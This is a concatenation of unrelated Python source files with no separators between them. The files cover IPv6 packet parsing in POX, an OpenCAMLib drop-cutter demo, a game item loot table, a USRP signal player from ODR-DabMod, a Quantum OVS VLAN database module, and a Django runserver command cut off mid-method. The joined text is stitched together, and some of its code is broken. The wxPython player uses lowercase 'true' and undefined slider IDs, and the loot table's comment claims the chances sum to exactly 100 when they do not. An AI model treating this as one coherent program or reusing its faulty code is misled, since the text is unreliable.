""" return {} class FixedExtensionHeader (ExtensionHeader): """ A superclass for fixed length Extension Headers """ #TYPE = <type number> #LENGTH = <total length in bytes> def __init__ (self, *args, **kw): self.next_header_type = None self._init(*args, **kw) init_helper(self, kw) def __len__ (self): """ Returns the packed length """ return self.LENGTH @classmethod def unpack_new (cls, raw, offset = 0, max_length = None): """ Unpacks a new instance of this class from a buffer """ if max_length is not None and (max_length - offset) < cls.LENGTH: raise TruncatedException() nh = struct.unpack_from("!B", raw, offset)[0] d = cls._unpack_body(raw, offset + 1, nh, cls.LENGTH - 1) offset += cls.LENGTH d['next_header_type'] = nh return offset, cls(**d) def pack (self): o = struct.pack("!B", self.next_header_type) + self._pack_body() assert len(o) == self.LENGTH, "Bad packed length" return o def _init (self, *args, **kw): """ Called during initialization Override me """ pass def _pack_body (self): """ Returns the body of this Extension Header packed into bytes Override me """ return b'' @classmethod def _unpack_body (self, raw, offset, next_header_type, length): """ Unpacks the body portion of an Extension Header Override me. """ return {} class DummyExtensionHeader (NormalExtensionHeader): """ Just saves the raw body data """ def _init (self, *args, **kw): self.raw_body = b'' def _pack_body (self): return self.raw_body @classmethod def _unpack_body (self, raw, offset, next_header_type, length): return {'raw_body':raw[offset:offset+length]} class DummyFixedExtensionHeader (FixedExtensionHeader): """ Just saves the raw body data """ def _init (self, *args, **kw): self.raw_body = '\x00' * (self.LENGTH - 1) def _pack_body (self): return self.raw_body @classmethod def _unpack_body (self, raw, offset, next_header_type, length): return {'raw_body':raw[offset:offset+length]} #TODO: Implement Extension Headers for real (they're pretty much just # placeholders at present) #TODO: Implement the IPSec options (Authentication and ESP) @extension_header_def(0) class HopByHopOptions (DummyExtensionHeader): pass @extension_header_def(43) class Routing (DummyExtensionHeader): pass @extension_header_def(44) class Fragment (DummyFixedExtensionHeader): LENGTH = 8 pass @extension_header_def(60) class DestinationOptions (DummyExtensionHeader): pass class ipv6 (packet_base): """ IPv6 packet class """ MIN_LEN = 40 ICMP6_PROTOCOL = 58 TCP_PROTOCOL = 6 UDP_PROTOCOL = 17 IGMP_PROTOCOL = 2 NO_NEXT_HEADER = 59 def __init__ (self, raw=None, prev=None, **kw): packet_base.__init__(self) self.prev = prev self.v = 6 self.tc = 0 self.flow = 0 self.payload_length = 0 self.next_header_type = None self.hop_limit = 0 self.srcip = IPAddr6.UNDEFINED self.dstip = IPAddr6.UNDEFINED self.extension_headers = [] self.next = b'' if raw is not None: self.parse(raw) self._init(kw) @property def payload_type (self): """ The last header type """ if len(self.extension_headers): if isinstance(self.extension_headers[-1], ExtensionHeader): return self.extension_headers[-1].next_header_type else: return self.next_header_type return None @payload_type.setter def payload_type (self, value): if len(self.extension_headers): if isinstance(self.extension_headers[-1], ExtensionHeader): self.extension_headers[-1].next_header_type = value else: raise RuntimeError("Can't set payload_type") else: self.next_header_type = value def parse (self, raw, offset=0): assert isinstance(raw, bytes) self.raw = raw if len(raw) < self.MIN_LEN: self.msg('warning IP packet data too 
short to parse header:' ' data len %u' % (len(raw),)) return (vtcfl, self.payload_length, nht, self.hop_limit) \ = struct.unpack('!IHBB', raw[offset:offset+8]) self.srcip = IPAddr6(raw[offset+8:offset+24], raw=True) self.dstip = IPAddr6(raw[offset+24:offset+40], raw=True) self.next_header_type = nht offset += 40 self.v = vtcfl >> 28 self.tc = (vtcfl >> 20) & 0xff self.flow = vtcfl & 0xfffff if self.v != 6: self.msg('ip parse) warning IP version %u not IPv6' % self.v) return length = self.payload_length if length > len(raw): length = len(raw) # Clamp to what we've got self.msg('(ipv6) warning IP packet data incomplete (%s of %s)' % (len(raw), self.payload_length)) while nht != ipv6.NO_NEXT_HEADER: c = _extension_headers.get(nht) if c: if length < 8: self.msg('(ipv6) warning, packet data incomplete') return try: offset,o = c.unpack_new(raw, offset, max_length = length) length -= len(o) except TruncatedException: self.msg('(ipv6) warning, packet data truncated') return self.extension_headers.append(o) nht = o.next_header_type else: break self.parsed = True #TODO: This should be done a better way (and shared with IPv4?). if nht == self.UDP_PROTOCOL: self.next = udp(raw=raw[offset:offset+length], prev=self) elif nht == self.TCP_PROTOCOL: self.next = tcp(raw=raw[offset:offset+length], prev=self) elif nht == self.ICMP6_PROTOCOL: self.next = icmpv6(raw=raw[offset:offset+length], prev=self) # elif nht == self.IGMP_PROTOCOL: # self.next = igmp(raw=raw[offset:offset+length], prev=self) elif nht == self.NO_NEXT_HEADER: self.next = None else: self.next = raw[offset:offset+length] if isinstance(self.next, packet_base) and not self.next.parsed: self.next = raw[offset:offset+length] def add_header (self, eh): if self.extension_headers: assert isinstance(self.extension_headers[-1], ExtensionHeader) self.extension_headers[-1].next_header_type = eh.TYPE else: self._next_header_type = eh.TYPE def hdr (self, payload): vtcfl = self.v << 28 vtcfl |= (self.flow & 0xfffff) vtcfl |= (self.tc & 0xff) << 20 if self.next_header_type is None: if self.extension_headers: nht = self.extension_headers[0].TYPE else: #TODO: We should infer this? assert False, "Must set next header type" else: nht = self.next_header_type self.next_header_type = nht #FIXME: this is a hack # Ugh, this is also an ugly hack if hasattr(payload, 'pack'): self.payload_length = len(payload.pack()) else: self.payload_length = len(payload) r = struct.pack("!IHBB", vtcfl, self.payload_length, nht, self.hop_limit) r += self.srcip.raw r += self.dstip.raw return r def _to_str (self): ehs = [ipproto_to_str(self.next_header_type)] for eh in self.extension_headers: ehs.append(ipproto_to_str(eh.next_header_type)) s = "IPv6 %s>%s" % (self.srcip, self.dstip) return "[" + s + " " + "+".join(ehs) + "]" #def __str__ (self): # s = "[IP%s+%s %s>%s (hl:%s)]" % ( # self.v, # ipproto_to_str(self.next_header_type), # self.srcip, self.dstip, self.hop_limit) # return s
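# Illustrative sketch only (not part of pox.lib.packet): building a minimal
# IPv6 header with the class above and round-tripping it through hdr() and
# parse().  hdr() packs just the fixed 40-byte header; extension headers are
# still placeholders and would need to be packed separately.  The function
# name _ipv6_example and the documentation-prefix addresses are assumptions.
def _ipv6_example():
    pkt = ipv6()
    pkt.srcip = IPAddr6("2001:db8::1")
    pkt.dstip = IPAddr6("2001:db8::2")
    pkt.hop_limit = 64
    pkt.next_header_type = ipv6.NO_NEXT_HEADER  # 59: nothing follows
    raw = pkt.hdr(b'')              # fixed header only; payload_length stays 0
    assert len(raw) == ipv6.MIN_LEN
    # Round-trip: parse the bytes we just produced
    parsed = ipv6(raw=raw)
    return parsed.srcip, parsed.dstip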
import ocl import camvtk import time import vtk if __name__ == "__main__": print ocl.revision() myscreen = camvtk.VTKScreen() stl = camvtk.STLSurf("../stl/demo.stl") print "STL surface read" myscreen.addActor(stl) stl.SetWireframe() polydata = stl.src.GetOutput() s= ocl.STLSurf() camvtk.vtkPolyData2OCLSTL(polydata, s) print "STLSurf with ", s.size(), " triangles" # define a cutter #cutter = ocl.CylCutter(0.6, 5) cutter = ocl.BullCutter(0.6, 0.01, 5) print cutter pdc = ocl.PathDropCutter() # create a pdc apdc = ocl.AdaptivePathDropCutter() pdc.setSTL(s) apdc.setSTL(s) pdc.setCutter(cutter) # set the cutter apdc.setCutter(cutter) #print "set minimumZ" #pdc.minimumZ = -1 # set the minimum Z-coordinate, or "floor" for drop-cutter #apdc.minimumZ = -1 #print "set the sampling interval" pdc.setSampling(0.4) apdc.setSampling(0.4) apdc.setMinSampling(0.0008) print " apdc sampling = ", apdc.getSampling() # some parameters for this "zigzig" pattern ymin=0 ymax=12 Ny=10 # number of lines in the y-direction dy = float(ymax-ymin)/Ny # the y step-over path = ocl.Path() # create an empty path object path2 = ocl.Path() # add Line objects to the path in this loop for n in xrange(0,Ny): y = ymin+n*dy p1 = ocl.Point(0,y,0) # start-point of line p2 = ocl.Point(10,y,0) # end-point of line l = ocl.Line(p1,p2) # line-object l2 = ocl.Line(p1,p2) path.append( l ) # add the line to the path path2.append( l2 ) print " set the path for pdf " pdc.setPath( path ) apdc.setPath( path2 ) print " run the calculation " t_before = time.time() pdc.run() # run drop-cutter on the path t_after = time.time() print " pdc run took ", t_after-t_before," s" print " run the calculation " t_before = time.time() apdc.run() # run drop-cutter on the path t_after = time.time() print " apdc run took ", t_after-t_before," s" print "get the results " clp = pdc.getCLPoints() # get the cl-points from pdf aclp = apdc.getCLPoints() print "got ", len(aclp) ," adaptive points" aclp_lifted=[] for p in aclp: p2 = ocl.Point(p.x,p.y,p.z) + ocl.Point(0,0,1) aclp_lifted.append(p2) # filter the adaptively sampled toolpaths print "filtering. before filter we have", len(aclp_lifted),"cl-points" t_before = time.time() f = ocl.LineCLFilter() f.setTolerance(0.001) for p in aclp_lifted: p2 = ocl.CLPoint(p.x,p.y,p.z) f.addCLPoint(p2) f.run() t_after = time.time() calctime = t_after-t_before print " done in ", calctime," s" cl_filtered = f.getCLPoints() aclp_lifted2=[] for p in cl_filtered: p2 = ocl.Point(p.x,p.y,p.z) + ocl.Point(0,0,1) aclp_lifted2.append(p2) print " render the CL-points" camvtk.drawCLPointCloud(myscreen, clp) camvtk.drawCLPointCloud(myscreen, aclp_lifted) camvtk.drawCLPointCloud(myscreen, aclp_lifted2) #myscreen.addActor( camvtk.PointCloud(pointlist=clp, collist=ccp) ) myscreen.camera.SetPosition(3, 23, 15) myscreen.camera.SetFocalPoint(5, 5, 0) myscreen.render() print " All done." myscreen.iren.Start()
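# Illustrative helper (not part of the example script above): the CL-point
# filtering step from the script, wrapped so it can be reused on any list of
# points exposing .x/.y/.z.  It uses the same ocl.LineCLFilter calls as the
# script; the function name filter_cl_points is purely illustrative and the
# tolerance default mirrors the example.
def filter_cl_points(points, tolerance=0.001):
    """Reduce near-collinear CL-points with ocl.LineCLFilter and return the survivors."""
    f = ocl.LineCLFilter()
    f.setTolerance(tolerance)
    for p in points:
        f.addCLPoint(ocl.CLPoint(p.x, p.y, p.z))
    f.run()
    return f.getCLPoints()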
def itemNames(): items = ['animal_hide_rack_style_1','animal_hide_rack_style_2','animal_hide_rack_style_3','animal_hide_rack_style_4'] items +=['at_st_pilots_helmet','aurilian_sculpture_section_1','aurilian_sculpture_section_2','aurilian_sculpture_section_3'] items +=['aurilian_sculpture_section_4','banes_heart','bar_corner_piece_1','bar_corner_piece_2'] items +=['bar_corner_piece_3','bar_counter_large','bothan_beauty','bothan_buff'] items +=['cast_wing_in_flight','corellian_seaside','data_disk_hologram','decorative_bubble_tank'] items +=['droid_in_contrast','drum','emperors_eyes','family_bonds'] items +=['feared','fighter_study','fighters_courage','geonosian_costume_instructions'] items +=['hanging_life_day_orb','hutt_greed','imperial_oppression','jedi_statue_schematic'] items +=['jubilee_wheel_schematic','kachirho_wall_cornucopia','kowakian_cage','krayt_costume_instructions'] items +=['large_fruit_stand_schematic','large_unmarked_crate','lava_geode','life_day_lamp'] items +=['life_day_proud_wookie','life_day_red_robed_wookie','living_canals','lugjack_machine_schematic'] items +=['miniature_wroshyr_tree','modified_fusion_reactor_schematic','mustafarian_injector','mynock_costume_instructions'] items +=['no_division','nym_collectible_globe','pilgrimage','poster_of_a_ship_schematic'] items +=['poster_of_a_turret_schematic','poster_of_food_preparation','proton_chair','rancor_costume_instructions'] items +=['rotj_helmet','shard_of_the_serpent','stap1_vehicle_deed','target_dummy_black_sun'] items +=['target_dummy_rebel','target_dummy_stormtrooper','tatooine_dune_speeder','triumph'] items +=['ugnaught_costume_instructions','victory','wampa_costume_instructions','war_terminal'] items +=['warriors honor','wookie_home_banner_kit','wookie_life_day_orb','xeno_couch'] items +=['xeno_desk','xeno_desk_lamp','xeno_rug','xeno_table'] items += ['powercrystal_perfect'] return items def itemChances(): chances=[1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298] chances+=[1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298] chances+=[1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298] chances+=[1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298] chances+=[1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298] chances+=[1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298] chances+=[1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298,1.298] chances+=[1.298,1.298,1.298,1.298,1.298,1.298,1.298] return chances ##Sum must be exactly 100 77 items -> 1.298
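# Illustrative sanity check (not part of the loot tables above): the trailing
# comment says the chances must sum to 100 across 77 items at 1.298 each, but
# 77 * 1.298 = 99.946, so the total is only approximately 100.  This helper
# (name checkItemTables is an assumption) makes the length match and the total
# explicit instead of relying on the comment.
def checkItemTables(tolerance=0.1):
    items = itemNames()
    chances = itemChances()
    assert len(items) == len(chances), (len(items), len(chances))
    total = sum(chances)
    return abs(total - 100.0) <= tolerance, total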
#!/usr/bin/env python # Copyright (C) 2006, 2007, 2008, 2009,-2010 Her Majesty the Queen in # Right of Canada (Communications Research Center Canada) # This file is part of ODR-DabMod. # # ODR-DabMod is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # ODR-DabMod is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with ODR-DabMod. If not, see <http://www.gnu.org/licenses/>. from wxPython.wx import * from optparse import OptionParser from gnuradio import gr from gnuradio import usrp from gnuradio.wxgui import fftsink, scopesink from gnuradio.eng_notation import num_to_str from gnuradio.eng_option import * ID_ABOUT = wxNewId() ID_EXIT = wxNewId() ID_GAIN_SLIDER0 = wxNewId() ID_FREQ_SLIDER0 = wxNewId() ID_GAIN_SLIDER1 = wxNewId() ID_FREQ_SLIDER1 = wxNewId() ID_START = wxNewId() ID_STOP = wxNewId() def gcd(a, b) : if b == 0 : return a return gcd(b, a % b) def appendFrequency(option, opt, value, parser): if parser.values.frequency is None : parser.values.frequency = [ value ] else : parser.values.frequency.append(value) def listUsrp(option, opt, value, parser): id = 0 while (true) : try: version = usrp._look_for_usrp(id) print "USRP #%i" % id print " Rev: %i" % version dst = usrp.sink_c(id) src = usrp.source_c(id) print " Tx" for db in dst.db: if (db[0].dbid() != -1): print " %s" % db[0].side_and_name() (min, max, offset) = db[0].freq_range() print " Frequency" print " Min: %sHz" % num_to_str(min) print " Max: %sHz" % num_to_str(max) print " Offset: %sHz" % num_to_str(offset) (min, max, offset) = db[0].gain_range() print " Gain" print " Min: %sdB" % num_to_str(min) print " Max: %sdB" % num_to_str(max) print " Offset: %sdB" % num_to_str(offset) print " Rx" for db in src.db: if (db[0].dbid() != -1): print " %s" % db[0].side_and_name() (min, max, offset) = db[0].freq_range() print " Frequency" print " Min: %sHz" % num_to_str(min) print " Max: %sHz" % num_to_str(max) print " Offset: %sHz" % num_to_str(offset) (min, max, offset) = db[0].gain_range() print " Gain" print " Min: %sdB" % num_to_str(min) print " Max: %sdB" % num_to_str(max) print " Offset: %sdB" % num_to_str(offset) except RuntimeError: break id += 1 raise SystemExit class MyFrame(wxFrame): def __init__(self, parent, ID, title): wxFrame.__init__(self, parent, ID, title, wxDefaultPosition) self.pga = 0 self.pgaMin = -20 self.pgaMax = 0 self.pgaStep = 0.25 # Parsing options parser = OptionParser(option_class=eng_option, usage="usage: %prog [options] filename1" \ " [-f frequency2 filename2 [...]]") parser.add_option("-a", "--agc", action="store_true", help="enable agc") parser.add_option("-c", "--clockrate", type="eng_float", default=128e6, help="set USRP clock rate (128e6)") parser.add_option("--copy", action="store_true", help="enable real to imag data copy when in real mode") parser.add_option("-e", "--encoding", type="choice", choices=["s", "f"], default="f", help="choose data encoding: [s]igned or [f]loat.") parser.add_option("-f", "--frequency", type="eng_float", action="callback", callback=appendFrequency, help="set output frequency (222.064e6)") parser.add_option("-g", "--gain", type="float", help="set 
output pga gain") parser.add_option("-l", "--list", action="callback", callback=listUsrp, help="list USRPs and daugtherboards") parser.add_option("-m", "--mode", type="eng_float", default=2, help="mode: 1: real, 2: complex (2)") parser.add_option("-o", "--osc", action="store_true", help="enable oscilloscope") parser.add_option("-r", "--samplingrate", type="eng_float", default=3.2e6, help="set input sampling rate (3200000)") parser.add_option("-s", "--spectrum", action="store_true", help="enable spectrum analyzer") # parser.add_option("-t", "--tx", type="choice", choices=["A", "B"], # default="A", help="choose USRP tx A|B output (A)") parser.add_option("-u", "--usrp", action="store_true", help="enable USRP output") (options, args) = parser.parse_args() if len(args) == 0 : options.filename = [ "/dev/stdin" ] else : options.filename = args # Setting default frequency if options.frequency is None : options.frequency = [ 222.064e6 ] if len(options.filename) != len(options.frequency) : parser.error("Nb input file != nb frequency!") # Status bar # self.CreateStatusBar(3, 0) # msg = "PGA: %.2f dB" % (self.pga * self.pgaStep) # self.SetStatusText(msg, 1) # msg = "Freq: %.3f mHz" % (options.frequency[0] / 1000000.0) # self.SetStatusText(msg, 2) # Menu bar menu = wxMenu() menu.Append(ID_ABOUT, "&About", "More information about this program") menu.AppendSeparator() menu.Append(ID_EXIT, "E&xit", "Terminate the program") menuBar = wxMenuBar() menuBar.Append(menu, "&File") self.SetMenuBar(menuBar) # Main windows mainSizer = wxFlexGridSizer(0, 1) sliderSizer = wxFlexGridSizer(0, 2) buttonSizer = wxBoxSizer(wxHORIZONTAL) if options.usrp : # TX d'board 0 gainLabel = wxStaticText(self, -1, "PGA 0") gainSlider = wxSlider(self, ID_GAIN_SLIDER0, self.pga, self.pgaMin / self.pgaStep, self.pgaMax / self.pgaStep, style = wxSL_HORIZONTAL | wxSL_AUTOTICKS) gainSlider.SetSize((400, -1)) sliderSizer.Add(gainLabel, 0, wxALIGN_CENTER_VERTICAL | wxFIXED_MINSIZE, 0) sliderSizer.Add(gainSlider, 0, wxALIGN_CENTER_VERTICAL | wxFIXED_MINSIZE, 0) freqLabel = wxStaticText(self, -1, "Frequency 0") freqSlider = wxSlider(self, ID_FREQ_SLIDER0, options.frequency[0] / 16000, 0, 20e3, style = wxSL_HORIZONTAL | wxSL_AUTOTICKS) freqSlider.SetSize((400, -1)) sliderSizer.Add(freqLabel, 0, wxALIGN_CENTER_VERTICAL | wxFIXED_MINSIZE, 0) sliderSizer.Add(freqSlider, 0, wxALIGN_CENTER_VERTICAL | wxFIXED_MINSIZE, 0) if len(options.frequency) > 1 : # TX d'board 1 gainLabel = wxStaticText(self, -1, "PGA 1") gainSlider = wxSlider(self, ID_GAIN_SLIDER1, self.pga, self.pgaMin / self.pgaStep, self.pgaMax / self.pgaStep, style = wxSL_HORIZONTAL | wxSL_AUTOTICKS) gainSlider.SetSize((400, -1)) sliderSizer.Add(gainLabel, 0, wxALIGN_CENTER_VERTICAL | wxFIXED_MINSIZE, 0) sliderSizer.Add(gainSlider, 0, wxALIGN_CENTER_VERTICAL | wxFIXED_MINSIZE, 0) freqLabel = wxStaticText(self, -1, "Frequency 1") freqSlider = wxSlider(self, ID_FREQ_SLIDER1, options.frequency[1] / 16000, 0, 20e3, style = wxSL_HORIZONTAL | wxSL_AUTOTICKS) freqSlider.SetSize((400, -1)) sliderSizer.Add(freqLabel, 0, wxALIGN_CENTER_VERTICAL | wxFIXED_MINSIZE, 0) sliderSizer.Add(freqSlider, 0, wxALIGN_CENTER_VERTICAL | wxFIXED_MINSIZE, 0) mainSizer.Add(sliderSizer, 1, wxEXPAND, 0) start = wxButton(self, ID_START, "Start") stop = wxButton(self, ID_STOP, "Stop") buttonSizer.Add(start, 1, wxALIGN_CENTER, 0) buttonSizer.Add(stop, 1, wxALIGN_CENTER, 0) mainSizer.Add(buttonSizer, 1, wxEXPAND, 0) # GnuRadio self.fg = gr.flow_graph() if options.mode == 1 : print "Source: real" if (options.encoding == 
"s") : print "Source encoding: short" src = gr.file_source(gr.sizeof_short, options.filename[0], 1) if (options.copy) : print "Imag: copy" imag = src else : print "Imag: null" imag = gr.null_source(gr.sizeof_short) interleaver = gr.interleave(gr.sizeof_short) self.fg.connect(src, (interleaver, 0)) self.fg.connect(imag, (interleaver, 1)) tail = interleaver elif (options.encoding == "f") : print "Source encoding: float" src = gr.file_source(gr.sizeof_gr_complex, options.filename[0], 1) tail = src elif (options.mode == 2) : print "Source: complex" if len(options.frequency) == 1 : if (options.encoding == "s") : print "Source encoding: short" src = gr.file_source(gr.sizeof_short, options.filename[0], 1) elif (options.encoding == "f") : print "Source encoding: float" src = gr.file_source(gr.sizeof_gr_complex, options.filename[0], 1) else : parser.error("Invalid encoding type for complex data!") tail = src elif (len(options.frequency) == 2) : src0 = gr.file_source(gr.sizeof_gr_complex, options.filename[0], 1) src1 = gr.file_source(gr.sizeof_gr_complex, options.filename[1], 1) interleaver = gr.interleave(gr.sizeof_gr_complex) self.fg.connect(src0, (interleaver, 0)) self.fg.connect(src1, (interleaver, 1)) tail = interleaver else : parser.error( "Invalid number of source (> 2) with complex input!") else : parser.error("Invalid mode!") # Interpolation dac_freq = options.clockrate interp = int(dac_freq / options.samplingrate) if interp == 0 : parser.error("Invalid sampling rate!") if options.mode == 2 : print "Input sampling rate: %s complex samples/s" % \ num_to_str(options.samplingrate) else : print "Input sampling rate: %s samples/s" % \ num_to_str(options.samplingrate) print "Interpolation rate: int(%s / %s) = %sx" % \ (num_to_str(dac_freq), num_to_str(options.samplingrate), interp) if interp > 512 : factor = gcd(dac_freq / 512, options.samplingrate) num = int((dac_freq / 512) / factor) den = int(options.samplingrate / factor) print "Resampling by %i / %i" % (num, den) resampler = blks.rational_resampler_ccc(self.fg, num, den) self.fg.connect(tail, resampler) tail = resampler interp = 512 options.samplingrate = dac_freq / 512 # AGC if options.agc : agc = gr.agc_cc() self.fg.connect(tail, agc) tail = agc # USRP if options.usrp : nchan = len(options.frequency) if len(options.frequency) == 1 : if options.mode == 1 : mux = 0x00000098 elif options.mode == 2 : mux = 0x00000098 else : parser.error("Unsupported mode for USRP mux!") elif len(options.frequency) == 2 : if options.mode == 1 : mux = 0x0000ba98 elif options.mode == 2 : mux = 0x0000ba98 else : parser.error("Unsupported mode for USRP mux!") else : parser.error("Invalid number of frequency [0..2]!") # if options.tx == "A" : # mux = 0x00000098 # else : # mux = 0x00009800 print "Nb channels: ", nchan print "Mux: 0x%x" % mux if options.encoding == 's' : dst = usrp.sink_s(0, interp, nchan, mux) elif options.encoding == 'f' : dst = usrp.sink_c(0, interp, nchan, mux) else : parser.error("Unsupported data encoding for USRP!") dst.set_verbose(1) for i in range(len(options.frequency)) : if options.gain is None : print "Setting gain to %f" % dst.pga_max() dst.set_pga(i << 1, dst.pga_max()) else : print "Setting gain to %f" % options.gain dst.set_pga(i << 1, options.gain) tune = false for dboard in dst.db: if (dboard[0].dbid() != -1): device = dboard[0] print "Tuning TX d'board %s to %sHz" % \ (device.side_and_name(), num_to_str(options.frequency[i])) device.lo_offset = 38e6 (min, max, offset) = device.freq_range() print " Frequency" print " Min: %sHz" % 
num_to_str(min) print " Max: %sHz" % num_to_str(max) print " Offset: %sHz" % num_to_str(offset) #device.set_gain(device.gain_range()[1]) device.set_enable(True) tune = \ dst.tune(device._which, device, options.frequency[i] * 128e6 / dac_freq) if tune: print " Baseband frequency: %sHz" % \ num_to_str(tune.baseband_freq) print " DXC frequency: %sHz" % \ num_to_str(tune.dxc_freq) print " Residual Freqency: %sHz" % \ num_to_str(tune.residual_freq) print " Inverted: ", \ tune.inverted mux = usrp.determine_tx_mux_value(dst, (device._which, 0)) dst.set_mux(mux) break else: print " Failed!" if not tune: print " Failed!" raise SystemExit # int nunderruns () print "USRP" print " Rx halfband: ", dst.has_rx_halfband() print " Tx halfband: ", dst.has_tx_halfband() print " Nb DDC: ", dst.nddc() print " Nb DUC: ", dst.nduc() #dst._write_9862(0, 14, 224) print " DAC frequency: %s samples/s" % num_to_str(dst.dac_freq()) print " Fpga decimation rate: %s -> %s samples/s" % \ (num_to_str(dst.interp_rate()), num_to_str(dac_freq / dst.interp_rate())) print " Nb channels:", if hasattr(dst, "nchannels()") : print dst.nchannels() else: print "N/A" print " Mux:", if hasattr(dst, "mux()") : print "0x%x" % dst.mux() else : print "N/A" print " FPGA master clock frequency:", if hasattr(dst, "fpga_master_clock_freq()") : print "%sHz" % num_to_str(dst.fpga_master_clock_freq()) else : print "N/A" print " Converter rate:", if hasattr(dst, "converter_rate()") : print "%s" % num_to_str(dst.converter_rate()) else : print "N/A" print " DAC rate:", if hasattr(dst, "dac_rate()") : print "%s sample/s" % num_to_str(dst.dac_rate()) else : print "N/A" print " Interp rate: %sx" % num_to_str(dst.interp_rate()) print " DUC frequency 0: %sHz" % num_to_str(dst.tx_freq(0)) print " DUC frequency 1: %sHz" % num_to_str(dst.tx_freq(1)) print " Programmable Gain Amplifier 0: %s dB" % \ num_to_str(dst.pga(0)) print " Programmable Gain Amplifier 1: %s dB" % \ num_to_str(dst.pga(2)) else : dst = gr.null_sink(gr.sizeof_gr_complex) # AGC if options.agc : agc = gr.agc_cc() self.fg.connect(tail, agc) tail = agc self.fg.connect(tail, dst) # oscilloscope if options.osc : oscPanel = wxPanel(self, -1) if (options.encoding == "s") : converter = gr.interleaved_short_to_complex() self.fg.connect(tail, converter) signal = converter elif (options.encoding == "f") : signal = tail else : parser.error("Unsupported data encoding for oscilloscope!") #block = scope_sink_f(fg, parent, title=label, sample_rate=input_rate) #return (block, block.win) oscWin = scopesink.scope_sink_c(self.fg, oscPanel, "Signal", options.samplingrate) self.fg.connect(signal, oscWin) mainSizer.Add(oscPanel, 1, wxEXPAND) # spectrometer if options.spectrum : ymin = 0 ymax = 160 fftPanel = wxPanel(self, -1) if (options.encoding == "s") : converter = gr.interleaved_short_to_complex() self.fg.connect(tail, converter) signal = converter elif (options.encoding == "f") : signal = tail else : parser.error("Unsupported data encoding for oscilloscope!") fftWin = fftsink.fft_sink_c(self.fg, fftPanel, title="Spectrum", fft_size=2048, sample_rate=options.samplingrate, y_per_div=(ymax - ymin) / 8, ref_level=ymax, fft_rate=50, average=True ) self.fg.connect(signal, fftWin) mainSizer.Add(fftPanel, 1, wxEXPAND) # Events EVT_MENU(self, ID_ABOUT, self.OnAbout) EVT_MENU(self, ID_EXIT, self.TimeToQuit) EVT_SLIDER(self, ID_GAIN_SLIDER0, self.slideEvent) EVT_SLIDER(self, ID_FREQ_SLIDER0, self.slideEvent) EVT_SLIDER(self, ID_GAIN_SLIDER1, self.slideEvent) EVT_SLIDER(self, ID_FREQ_SLIDER1, self.slideEvent) 
EVT_BUTTON(self, ID_START, self.onClick) EVT_BUTTON(self, ID_STOP, self.onClick) #Layout sizers self.SetSizer(mainSizer) self.SetAutoLayout(1) mainSizer.Fit(self) self.fg.start() def OnAbout(self, event): dlg = wxMessageDialog(self, "This sample program shows off\n" "frames, menus, statusbars, and this\n" "message dialog.", "About Me", wxOK | wxICON_INFORMATION) dlg.ShowModal() dlg.Destroy() def TimeToQuit(self, event): self.Close(true) def slideEvent(self, evt): value = evt.GetInt() id = evt.GetId() if id == ID_GAIN_SLIDER: msg = "PGA: %.2f dB" % (value * self.pgaStep) self.SetStatusText(msg, 1) elif id == ID_FREQ_SLIDER: msg = "Freq: %.3f mHz" % (value * 16.0 / 1000) self.SetStatusText(msg, 2) else: print "Slider event not yet coded!" self.Close(True) def onClick(self, event): id = event.GetId() if id == ID_START: self.fg.start() elif id == ID_STOP: self.fg.stop() else: print "Click event not yet coded!" self.Close(True) class MyApp(wxApp): def OnInit(self): frame = MyFrame(NULL, -1, "Digital WAve Player") frame.Show(true) self.SetTopWindow(frame) return true app = MyApp(0) app.MainLoop()
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 Nicira Networks, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# @author: Somik Behera, Nicira Networks, Inc.
# @author: Brad Hall, Nicira Networks, Inc.
# @author: Dan Wendlandt, Nicira Networks, Inc.

from sqlalchemy.orm import exc

import quantum.db.api as db
import quantum.db.models as models

import ovs_models


def get_vlans():
    session = db.get_session()
    try:
        bindings = session.query(ovs_models.VlanBinding).\
            all()
    except exc.NoResultFound:
        return []
    res = []
    for x in bindings:
        res.append((x.vlan_id, x.network_id))
    return res


def add_vlan_binding(vlanid, netid):
    session = db.get_session()
    binding = ovs_models.VlanBinding(vlanid, netid)
    session.add(binding)
    session.flush()
    return binding.vlan_id


def remove_vlan_binding(netid):
    session = db.get_session()
    try:
        binding = session.query(ovs_models.VlanBinding).\
            filter_by(network_id=netid).\
            one()
        session.delete(binding)
    except exc.NoResultFound:
        pass
    session.flush()
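# --- Hypothetical usage sketch (not part of the original module) ---
# Assuming the quantum database has already been configured, the VLAN
# binding helpers above could be exercised like this; the vlan id and
# network uuid are made-up example values.
if __name__ == '__main__':
    vlan = add_vlan_binding(100, "3f2504e0-4f89-11d3-9a0c-0305e82c3301")
    for vlan_id, network_id in get_vlans():
        print "vlan %s -> network %s" % (vlan_id, network_id)
    remove_vlan_binding("3f2504e0-4f89-11d3-9a0c-0305e82c3301")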
from optparse import make_option

from django.conf import settings
from django.core.management.commands.runserver import BaseRunserverCommand

from django.contrib.staticfiles.handlers import StaticFilesHandler


class Command(BaseRunserverCommand):
    option_list = BaseRunserverCommand.option_list + (
        make_option('--nostatic', action="store_false",
            dest='use_static_handler', default=True,
            help='Tells Django to NOT automatically serve static files at STATICFILES_URL.'),
        make_option('--insecure', action="store_true",
            dest='insecure_serving', default=False,
            help='Allows serving static files even if DEBUG is False.'),
    )
    help = "Starts a lightweight Web server for development, including static files serving."

    def get_handler(self, *args, **options):
